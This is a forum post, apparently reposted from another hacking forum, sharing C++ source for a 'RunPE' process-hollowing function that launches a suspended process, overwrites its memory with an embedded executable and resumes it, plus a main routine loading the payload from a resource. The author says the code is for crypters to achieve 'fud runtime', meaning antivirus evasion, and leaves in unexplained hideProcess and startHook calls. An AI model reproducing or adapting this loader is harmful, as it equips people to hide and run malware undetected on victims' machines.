Jump to content
Nytro

[c++] Run Program From Memory And Not File

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[c++] Run Program From Memory And Not File

Author: Galco 

void RunFromMemory(char* pImage,char* pPath)
{
	DWORD dwWritten = 0;
	DWORD dwHeader = 0; 
	DWORD dwImageSize = 0;
	DWORD dwSectionCount = 0;
	DWORD dwSectionSize = 0;
	DWORD firstSection = 0;
	DWORD previousProtection = 0;
	DWORD jmpSize = 0;

	IMAGE_NT_HEADERS INH;
	IMAGE_DOS_HEADER IDH;
	IMAGE_SECTION_HEADER Sections[1000];

	PROCESS_INFORMATION peProcessInformation;
	STARTUPINFO peStartUpInformation;
	CONTEXT pContext;

	char* pMemory;
	char* pFile;
	memcpy(&IDH,pImage,sizeof(IDH));
	memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));

	dwImageSize = INH.OptionalHeader.SizeOfImage;
	pMemory = (char*)malloc(dwImageSize);
	memset(pMemory,0,dwImageSize);
	pFile = pMemory;

	dwHeader = INH.OptionalHeader.SizeOfHeaders;
	firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
	memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

	memcpy(pFile,pImage,dwHeader);

	if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
	{
		jmpSize = INH.OptionalHeader.SizeOfHeaders;
	}
	else
	{
		jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
		jmpSize += 1;
		jmpSize *= INH.OptionalHeader.SectionAlignment;
	}

	pFile = (char*)((DWORD)pFile + jmpSize);

	for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
	{
		jmpSize = 0;
		dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
		memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);

		if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
		{
			jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
		}
		else
		{
			jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
			jmpSize += 1;
			jmpSize *= INH.OptionalHeader.SectionAlignment;
		}
		pFile = (char*)((DWORD)pFile + jmpSize);
	}


	memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
	memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
	memset(&pContext,0,sizeof(CONTEXT));

	peStartUpInformation.cb = sizeof(peStartUpInformation);
	if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
	{
		hideProcess(peProcessInformation.dwProcessId);
		startHook(peProcessInformation.hProcess);
		pContext.ContextFlags = CONTEXT_FULL;
		GetThreadContext(peProcessInformation.hThread,&pContext);
		VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
		WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
		WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
		pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
		SetThreadContext(peProcessInformation.hThread,&pContext);
		VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
		ResumeThread(peProcessInformation.hThread);
	}
	free(pMemory);
}

This function will run a process based on it's memory instead of running a process from a file.

Meaning, you can use this in crypters to have fud runtime.

You can basically load an exe as a resource into your code and run it as a process like this:

int main(int argc,char* argv[])
{
HGLOBAL hResData;
HRSRC   hResInfo;
void	*pvRes;
DWORD dwSize;
char* lpMemory;
HMODULE hModule = GetModuleHandle(NULL);

if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(IDD_EXE1), "EXE")) != NULL) &&((hResData = LoadResource(hModule, hResInfo)) != NULL) &&((pvRes = LockResource(hResData)) != NULL))
{ 
	dwSize = SizeofResource(hModule, hResInfo);
	lpMemory = (char*)malloc (dwSize);
	memset(lpMemory,0,dwSize);
	memcpy (lpMemory, pvRes, dwSize);
	RunFromMemory(lpMemory,argv[0]);	
}
}

The program running the process must have the same image base or else it will not work.

By the way, ignore these two lines:

hideProcess(peProcessInformation.dwProcessId);

startHook(peProcessInformation.hProcess);

I forgot to edit them out when I posted the function. Lol. Dont ask what they were used for.

Sursa: [c++] Run Program From Memory And Not File - rohitab.com - Forums

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...